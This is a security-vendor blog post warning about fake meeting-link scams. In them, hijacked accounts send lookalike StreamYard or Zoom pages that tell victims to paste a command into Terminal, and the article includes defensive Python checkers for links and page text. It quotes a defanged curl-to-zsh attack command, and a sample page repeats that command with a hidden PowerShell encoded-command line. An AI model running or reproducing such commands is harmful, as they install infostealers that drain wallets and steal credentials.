Fake meeting-link malware scam: the Zoom call that drains your wallet
Someone messages you to hop on a quick recording or interview and insists on their own video-call link. The page imitates StreamYard, Zoom or Teams, but it never opens a call. It shows a "copy and paste this command into Terminal" screen. The command pipes a remote script straight into your shell, which silently installs an infostealer that grabs your browser data, crypto wallet data, seed phrases and private keys.
Bottom Line First
If a DM invites you to a recording or interview, rejects your normal meeting link, insists on its own link, and that "join" page tells you to copy and paste a command into Terminal to enter, stop. That is malware, not a meeting. On-chain investigator ZachXBT flagged this exact pattern on XChat (X's direct messages) and warned that the message often arrives from a compromised, verified account with a large following, so it can look like it came from someone you trust. The fake page imitates StreamYard, Zoom or Microsoft Teams and sits on a lookalike domain. It never opens a call. It shows a "Copy & Paste Command" screen, and the command pipes a remote script into your shell, which installs an infostealer that steals browser data, crypto wallet data, seed and mnemonic phrases, private keys, and Telegram and macOS Keychain data. One fake video-call app called Vortax drained a victim of $245,000 (per ZachXBT). The fix is one rule: a real Zoom, Teams, StreamYard or Google Meet call opens in your browser or your already-installed app. It never makes you paste a command into Terminal to join. The same "run this to continue" trick powers the fake CAPTCHA ClickFix attack, drives the deepfake Zoom CEO video fraud, and feeds the wider world of crypto wallet drainers.
What ZachXBT flagged
Here is what ZachXBT flagged:
The type of bs scammers post when sending malware to people on XChat.
— ZachXBT (@zachxbt) June 3, 2026
(Account is compromised) pic.twitter.com/zP24u3QhWq
The detail that makes this dangerous is in the parentheses: the account is compromised. The lure does not always come from a stranger with a brand-new handle. It can come from a real person you follow, whose account was taken over, which is why the message can slip past the gut check that normally protects you.
How the fake meeting-link scam works
The setup is social, not technical, and it follows a tight script. The DM arrives from a hijacked verified account with a large following, often a known crypto influencer whose account was taken over (the real owner is a victim too). Because the handle is real and verified, there is no impersonation to spot. The pitch is friendly and flattering: they want you on their podcast, an interview, or a quick "join us" recording call on X.
Here is the tell that separates this from a normal invite. When you offer your own link, a regular Google Meet on meet.google.com, they reject it. They insist you use their link instead, a fake StreamYard page on a lookalike domain such as streamyard.host01eu.com or streamyard.appstore.ms. The real StreamYard lives on streamyard.com, nowhere else. The exact lookalike domain varies across the campaign.
Then they push you onto a computer. If you say you are on your phone, they press: "what's the issue with joining from a PC?" That is not curiosity. The malware payload is a desktop infostealer, mostly aimed at macOS, so it needs you on a Mac or PC, not mobile.
The fake "join" page does not open a call. It shows a "Copy & Paste Command" screen with an instruction like "Copy & Paste this command into Terminal and press Enter." That single step is the entire attack, and the next section breaks it down.
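The domain rule above (the real StreamYard is on streamyard.com and nowhere else, and a brand name in a subdomain such as streamyard.host01eu.com proves nothing) can be turned into a mechanical check. The following is an added example written for this article, not SafeBrowz code and not one of its signatures. The allowlist and brand words are assumptions built from the domains the article names, and the check goes slightly beyond the text by also catching two other ways a link hides its real host: a user@host prefix, where everything before the @ is a username and the real host follows it, and punycode (xn--) labels that can render as lookalike characters.

```python
from urllib.parse import urlsplit

# Registrable domains of the real services named in the article (assumption:
# an illustrative allowlist; add the domains your organisation actually uses).
LEGIT_MEETING_DOMAINS = ("streamyard.com", "zoom.us", "meet.google.com", "teams.microsoft.com")

# Brand words that should never appear in a hostname outside those domains.
BRAND_TOKENS = ("streamyard", "zoom", "teams", "meet", "google", "microsoft")


def _split(url: str):
    # urlsplit() only finds the host when a scheme is present; a pasted
    # 'streamyard.host01eu.com/join' would otherwise parse as a bare path.
    return urlsplit(url if "://" in url else "https://" + url)


def is_under(host: str, domain: str) -> bool:
    """True for the domain itself or any subdomain of it (us02web.zoom.us is under zoom.us)."""
    return host == domain or host.endswith("." + domain)


def check_meeting_link(url: str) -> dict:
    """Classify a meeting link as ok / lookalike / unknown, judged by the real host only."""
    parts = _split(url.strip())
    host = (parts.hostname or "").lower().rstrip(".")
    result = {"host": host, "verdict": "unknown", "reason": ""}
    if not host:
        result["reason"] = "no hostname in link"
        return result
    if parts.username:
        # https://streamyard.com@evil.example/ : 'streamyard.com' is a username,
        # the host the browser actually connects to is what follows the '@'.
        result.update(verdict="lookalike", reason=f"credentials in URL; real host is {host}")
        return result
    if any(label.startswith("xn--") for label in host.split(".")):
        result.update(verdict="lookalike", reason="punycode label, possible homograph of a real domain")
        return result
    if any(is_under(host, d) for d in LEGIT_MEETING_DOMAINS):
        result.update(verdict="ok", reason="host is on a real meeting provider's domain")
        return result
    brands = [t for t in BRAND_TOKENS if any(t in label for label in host.split("."))]
    if brands:
        result.update(verdict="lookalike",
                      reason=f"brand {brands} appears in hostname but the domain is not a meeting provider")
        return result
    result["reason"] = "not a known meeting provider; treat as untrusted"
    return result


if __name__ == "__main__":
    # Illustrative links: the two lookalike hosts from the article plus constructed ones.
    for link in ("https://us02web.zoom.us/j/123456789",
                 "https://meet.google.com/abc-defg-hij",
                 "https://streamyard.host01eu.com/join",
                 "streamyard.appstore.ms/macos/installation",
                 "https://streamyard.com@evil.example/join",
                 "https://example.org/call"):
        r = check_meeting_link(link)
        print(f"{r['verdict']:<9} {r['host']:<28} {r['reason']}")
```

The verdict is driven by the registrable domain, not by whether a brand word appears somewhere in the link, which is exactly the distinction a lookalike is built to blur. Anything that comes back as "unknown" is still not a reason to join: it only means the host is not a provider you recognise.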
The copy-paste command is the whole attack
This is a ClickFix-style attack, the same technique behind the fake CAPTCHA ClickFix pages. There is no installer to download, no dmg to open. The fake join page simply asks you to copy one line of text and paste it into Terminal (on a Mac) or the Run dialog or PowerShell (on Windows), then press Enter. The instant you do, that command runs as you, with every permission your user account has: your files, your browser profiles, your keychain and your wallet software.
The command is a curl one-liner that fetches a remote script and pipes it straight into your shell. Piping a download directly into a shell means the code executes the moment it arrives, with no chance to read it first. Here is a defanged version of what the campaign uses. It is broken on purpose so it cannot run:
Do NOT run this - defanged sample, not executable
curl -kfsSL hxxps://streamyard.appstore[.]ms/macos/installation | zsh
The hxxps and the [.] are deliberately broken so the line is inert, and the exact domain and command change from one victim to the next. What does not change is the shape: download a script, pipe it into a shell, run it instantly. The flags are chosen for that job: -s and -S keep curl quiet except for errors, -f makes it fail silently on an HTTP error instead of piping an error page into zsh, -L follows redirects, and -k tells curl to skip TLS certificate checks, so the lure can be served from a host with a self-signed or mismatched certificate and nothing will complain. Because the fetch is made by curl rather than a browser, the server can also hand curl a different file from what you would see by opening the same URL in a tab, so "checking it in the browser first" proves nothing. In this campaign that script silently installs a macOS infostealer and wallet drainer that exfiltrates browser data, crypto wallet data, seed and mnemonic phrases, private keys, Telegram data and Keychain data. The wallet draining follows minutes later. You never saw a call, because there was never a call.
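The shape described above can be matched mechanically, and the same rules catch the Windows variants. The following is an added example written for this article, not SafeBrowz's detection code: the rules, the refanging helper and the sample "join" page text are constructed for illustration (the PowerShell blob is a placeholder, not a real encoded command). It refangs a defanged indicator like the one above, then scans page text for pipe-to-shell, PowerShell download-and-execute and "paste this into Terminal" instruction patterns.

```python
import re

# Turn defanged indicators (hxxps://, [.]) back into the form a live page uses,
# so pasted IOCs and scraped page text are matched by the same rules.
def refang(text: str) -> str:
    return (text.replace("hxxps://", "https://").replace("hxxp://", "http://")
                .replace("[.]", ".").replace("[:]", ":"))


SHELLS = r"(?:zsh|bash|sh|ksh|python3?|perl)"
TARGETS = r"(?:terminal|powershell|run\s+dialog|win\s*\+\s*r|command\s+prompt)"

# (category, pattern). Assumption: illustrative rules written for this example,
# not SafeBrowz's signatures; tune them against your own false-positive data.
RULES = [
    # curl/wget output piped straight into an interpreter: 'curl ... | zsh'
    ("pipe-to-shell", re.compile(rf"\b(?:curl|wget)\b[^|\n]*\|\s*(?:sudo\s+)?{SHELLS}\b", re.I)),
    # download inside a command substitution: bash -c "$(curl ...)"
    ("subshell-download", re.compile(rf"\b{SHELLS}\s+-c\s+['\"]?\$\(\s*(?:curl|wget)\b", re.I)),
    # base64-decoded payload piped into a shell
    ("base64-to-shell", re.compile(rf"\bbase64\s+(?:-d|--decode)\b[^|\n]*\|\s*{SHELLS}\b", re.I)),
    # PowerShell with an encoded command or a download-and-execute primitive
    ("powershell", re.compile(r"\b(?:powershell|pwsh)(?:\.exe)?\b[^\n]*?"
                              r"(?:-e(?:nc|ncodedcommand)?\b|\biex\b|invoke-expression|"
                              r"downloadstring|invoke-webrequest|\biwr\b)", re.I)),
    ("mshta", re.compile(r"\bmshta(?:\.exe)?\s+https?:", re.I)),
    # the social instruction itself: 'paste ... into Terminal', 'Win + R ... paste'
    ("paste-instruction", re.compile(rf"\bpaste\b[^\n]{{0,80}}\b{TARGETS}\b"
                                     rf"|\b{TARGETS}\b[^\n]{{0,80}}\bpaste\b", re.I)),
]


def find_clickfix(page_text: str) -> list[dict]:
    """Return every rule hit with its category, 1-based line number and matched text."""
    text = refang(page_text)
    hits = []
    for category, pattern in RULES:
        for m in pattern.finditer(text):
            hits.append({
                "category": category,
                "line": text.count("\n", 0, m.start()) + 1,
                "match": m.group(0).strip(),
            })
    return sorted(hits, key=lambda h: h["line"])


# Constructed sample of a fake "join" page, modelled on the defanged command
# shown in the article. Nothing in it is executed; it is only scanned.
SAMPLE_PAGE = """\
StreamYard - Join the studio
Your browser needs a quick update to enter the studio.
Copy & Paste this command into Terminal and press Enter:
curl -kfsSL hxxps://streamyard.appstore[.]ms/macos/installation | zsh
Windows users: press Win + R, paste and press Enter:
powershell -w hidden -enc <base64-blob>
"""

if __name__ == "__main__":
    for hit in find_clickfix(SAMPLE_PAGE):
        print(f"line {hit['line']:>2}  {hit['category']:<18} {hit['match']}")
```

Run against the sample it reports the curl pipe on line 4, the PowerShell command on line 6 and the two paste instructions on lines 3 and 5. The instruction rule is the one worth keeping even if the command rules are evaded by obfuscation: a page that asks a visitor to paste something into Terminal, the Run dialog or PowerShell has no legitimate reason to exist on a meeting site.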
The one tell that gives it away
Strip away every disguise and one fact defeats this entire scam:
A real video call, whether Zoom, Google Meet, Microsoft Teams or StreamYard, never asks you to paste a command into Terminal, the Run dialog, or PowerShell to join. The instant a "join" page shows a copy-paste command, it is malware.
When you join a legitimate call, the link opens your existing client or runs the meeting right in your browser tab. There is no command to copy, no Terminal to open, no shell step of any kind. Joining a video call is a click, never a paste. If a "meeting" ever tells you to copy something into Terminal, the Run box, or PowerShell to enter, that is the attack, not a glitch. Stop, and close the tab. The cure for the whole campaign is to join meetings only through software you already trust, never by running a command a meeting page hands you.
Red flags in a fake meeting-link DM
- The invite comes from a verified or known account that feels slightly off. A crypto influencer with tens of thousands of followers suddenly DMs you for a podcast or interview. The handle is real and verified, but the account may be hijacked. A verified badge does not make the link safe.
- They refuse your normal meeting platform and insist on their specific link. You offer a regular Google Meet, they reject it and push their own link instead. A genuine host has no reason to refuse a standard Meet or Zoom invite.
- They push you to join from a computer rather than your phone. "What's the issue with joining from a PC?" The desktop infostealer needs a Mac or PC, so being on mobile breaks the attack, which is exactly why they pressure you off it.
- The "join" page tells you to copy a command into Terminal. A real call is a click. The moment a join screen shows a "copy and paste this into Terminal and press Enter" instruction, it is malware. The same is true for a Run dialog or PowerShell command.
- The link sits on a lookalike domain. The address is a near-match, like streamyard.host01eu.com or streamyard.appstore.ms, not the real streamyard.com, zoom.us or meet.google.com.
- Urgency and pressure. "We go live in five minutes," "the guest before you ran over, jump in now." The rush is there to stop you checking the domain or thinking about that Terminal step.
- The message feels slightly off, even from someone you follow. Odd phrasing, an unusual ask, a tone that does not match the person. The account may be compromised. A trusted name does not make the command safe.
Why a message from a trusted contact can still be malware
The instinct that keeps most people safe is simple: trust messages from people you know. This scam is built to defeat exactly that. ZachXBT's note that "the account is compromised" is the whole point. When an attacker takes over a real account, the malicious DM arrives wearing a face you recognize. There is no misspelled handle, no stranger to be suspicious of, no impersonation to catch. It is genuinely your contact's account, just no longer in their hands.
That is why the rule has to be about the action, not the sender. It does not matter who appears to be asking. If any message, from anyone, leads to a meeting page that tells you to paste a command into Terminal, or that refuses your normal meeting link and insists on its own, the answer is no. Verify the person through a second channel before you act. A quick message on a different platform, or a call to a number you already had, costs nothing and breaks the scam. If you want to study how attackers research and target you first, our piece on spear phishing and LinkedIn profiling shows how the approach gets personalized, and the Telegram admin DM crypto scam covers the same trust-hijack on another platform.
The stakes are real. Attackers impersonating Andreessen Horowitz (a16z) set up a fake "podcast" meeting using a fake video-call app called Vortax and drained one victim of $245,000, according to ZachXBT. North Korean state-linked actors, tracked as part of the Lazarus group, ran fake Zoom and Teams meetings to steal more than $300 million. MetaMask security researcher Taylor Monahan has been tracking those losses. The Record (Recorded Future News), CoinJournal, crypto.news and CryptoSlate have all documented the playbook. The names and amounts change. The mechanism, a meeting page that asks you to install something, does not.
If you already ran the command
If you pasted that command into Terminal and pressed Enter, treat the device as compromised and move fast. The data harvest happens in seconds, and wallet draining follows.
- Disconnect the device from the internet. Turn off Wi-Fi and unplug ethernet to cut the malware off from the attacker. Do not keep using the machine for anything sensitive.
- Move your funds from a separate, clean device. Do not transfer from the infected machine. Use a different, trusted device, or a hardware wallet you know was never connected to it, to move assets to a fresh wallet whose seed phrase has never touched the infected computer.
- Revoke token approvals. From the clean device, use a revoke tool to cancel any token approvals on wallets that may have been exposed, so a drainer cannot pull tokens later. Our guide on what to do when your seed phrase is stolen walks through this step by step.
- Reset wallet credentials and assume the seed is burned. If a seed or private key sat on the infected device, consider it permanently exposed. Generate a new wallet on a clean device, never reuse the old seed, and migrate anything recoverable to the new address.
- Change passwords for browser-stored and exposed accounts. The malware reads saved browser data and Keychain data. From the clean device, change passwords on email, exchanges and anything important, and turn on app-based two-factor authentication everywhere. Saved passwords are only part of what a stealer takes: stolen session cookies let the attacker stay logged in after a password change, so also sign out of all sessions on each account and rotate any API keys or tokens that were stored on the machine.
- Secure your messaging accounts. Telegram data is a target. Terminate other sessions, reset your Telegram login, and check that no extra devices are attached to your X account.
- Wipe and reinstall the operating system on the infected device. Do not simply delete the file. A full clean reinstall is the only reliable way to be sure the stealer and any persistence are gone. Do not restore from a backup taken after you pasted the command, since it may carry the malware back.
How to report it
- Report to the FBI Internet Crime Complaint Center at ic3.gov. File a report with the wallet addresses, the malicious link and the timeline if you lost funds or had a device compromised.
- Report the account on the platform. If the DM came from a compromised X or Telegram account, report it so the platform can act and warn the real owner.
- Warn the real person. If you recognized the sender, reach them through a different channel. Their account is likely compromised and being used to hit their other contacts.
- Flag the malicious domain. Reporting the lookalike meeting domain to threat-intelligence feeds helps get the page taken down and protects the next target.
How SafeBrowz blocks this threat
SafeBrowz runs a 3-layer detection architecture: Local + APIs + AI. The goal here is to flag the fake meeting page and its lookalike domain before you ever reach the copy-paste command screen.
- Layer 1 - Local detection: 60+ URL pattern signatures plus a 550+ brand database (StreamYard, Zoom, Microsoft Teams and Google Meet included) plus homograph and Punycode checks, all running inside the extension before the page renders. It catches lookalike meeting domains like a fake streamyard subdomain and impersonation cases where a non-StreamYard, non-Zoom domain serves a meeting-styled join page.
- Layer 2 - API checks: aggregates Google Safe Browsing, PhishTank, URLhaus and ScamAdviser feeds plus 30+ scam TLD lists to flag domains and malware-hosting pages already known to be malicious, which covers many fake meeting and ClickFix command-paste campaigns.
- Layer 3 - AI deep scan (Premium): 100+ language content analysis catches brand-new fake meeting pages in seconds, including a page that copies the real StreamYard, Zoom or Teams styling but sits on the wrong domain and pushes a copy-paste command.
Detection signatures are derived from threat-intelligence research and our internal brand database, not from user browsing data. SafeBrowz does not store per-user browsing history.
Where browser-layer defense fits
A DM filter cannot tell a genuine meeting invite from a poisoned one, and the lookalike link can look almost right. The damage starts one click later, on the fake meeting page that tells you to paste a command into Terminal. Browser-layer scanning is built for exactly that moment. When a StreamYard, Zoom or Teams-styled page renders on a domain that is not the real one, a brand-aware scanner flags the impersonation before you ever reach the copy-paste command screen. SafeBrowz is a free extension for Chrome, Firefox and Edge (Safari coming soon) that checks every URL before it renders against a 550+ brand database. Install SafeBrowz and pair it with the one rule that beats this campaign: join meetings only through software you already have, and never paste a command a meeting page hands you. The same "run this to continue" trick drives the fake CAPTCHA ClickFix attack, and our breakdown of the fake Chrome update phishing scam shows how lookalike pages push malware elsewhere.
Install SafeBrowz free
Add the browser extension that runs every check in this article automatically, on every page, before it renders. Free forever, with optional Premium AI deep scan at $14.99 per year.
Frequently asked questions
How does the fake meeting-link malware scam work?
A DM arrives from a hijacked verified account with a large following, often a crypto influencer, inviting you to a podcast or interview. When you offer a normal Google Meet, they reject it and insist on their own link, a fake StreamYard page on a lookalike domain like streamyard.host01eu.com. They push you to join from a computer rather than your phone. The "join" page never opens a call. It tells you to copy and paste a command into Terminal and press Enter. That command pipes a remote script into your shell, which silently installs a macOS infostealer that steals browser data, crypto wallet data, seed phrases, private keys, Telegram data and Keychain data.
How do I tell a real meeting link from a fake one?
A real Zoom, Teams, StreamYard or Google Meet call opens in your browser or your already-installed app. It never asks you to paste a command into Terminal, the Run dialog, or PowerShell to join. Check the domain too: real meetings live on streamyard.com, zoom.us, meet.google.com or teams.microsoft.com, not on a lookalike like streamyard.host01eu.com or streamyard.appstore.ms. The instant a join page shows a copy-paste command, it is malware.
The DM came from someone I know. Can it still be malware?
Yes. ZachXBT flagged that these messages often come from a compromised, verified account with a large following, so the lure can appear to be from someone you trust. There is no misspelled handle to spot because it really is your contact's account, just taken over. Judge the action, not the sender: if any message refuses your normal meeting link, insists on its own, or leads to a page that tells you to paste a command into Terminal, do not act. Verify the person through a second channel first.
How much have people lost to this scam?
A fake video-call app called Vortax, used by attackers impersonating Andreessen Horowitz (a16z) for a fake podcast meeting, drained one victim of $245,000, according to ZachXBT. North Korean state-linked actors tracked as part of the Lazarus group used fake Zoom and Teams meetings to steal more than $300 million. MetaMask security researcher Taylor Monahan has been tracking the losses.
I pasted the command into Terminal. What do I do first?
Treat the device as compromised. Disconnect it from the internet, then from a separate clean device move your funds to a fresh wallet whose seed has never touched the infected machine, revoke token approvals, and reset wallet credentials. Change passwords on browser-stored and exposed accounts, secure your Telegram and X sessions, and do a full operating-system reinstall on the infected device rather than just deleting a file. Report the incident to the FBI at ic3.gov.
How do I report a fake meeting-link scam?
In the US, file a report with the FBI Internet Crime Complaint Center at ic3.gov, with the wallet addresses, the malicious link and the timeline if you lost funds. Report the compromised account on X or Telegram so the platform can act, warn the real owner through a different channel, and flag the malicious meeting domain to threat-intelligence feeds so the page can be taken down.
Related SafeBrowz coverage
- Deepfake Zoom CEO video fraud: the fake call that authorizes transfers
- What are crypto wallet drainers: the 2026 guide
- Crypto seed phrase stolen: what to do right now
- Telegram admin DM crypto scam: the fake support trap
- Fake Chrome update phishing scam: the "your browser is out of date" trick
- Fake CAPTCHA ClickFix: the "verify you are human" malware paste
- Spear phishing and LinkedIn profiling: how attackers target you
- Fake remote job laptop deposit scam (2026)
- Angler phishing: the fake support account that hijacks your reply
Bottom line: A meeting invite is not a threat. A meeting page that tells you to paste a command into Terminal is. If a DM, even from a verified name you trust, refuses your normal meeting link, insists on its own, and lands you on a "copy and paste this command" page, close it. Join calls only through software you already have, verify the person on a second channel, and put SafeBrowz on your browser so the fake meeting page is flagged before you ever reach the command screen.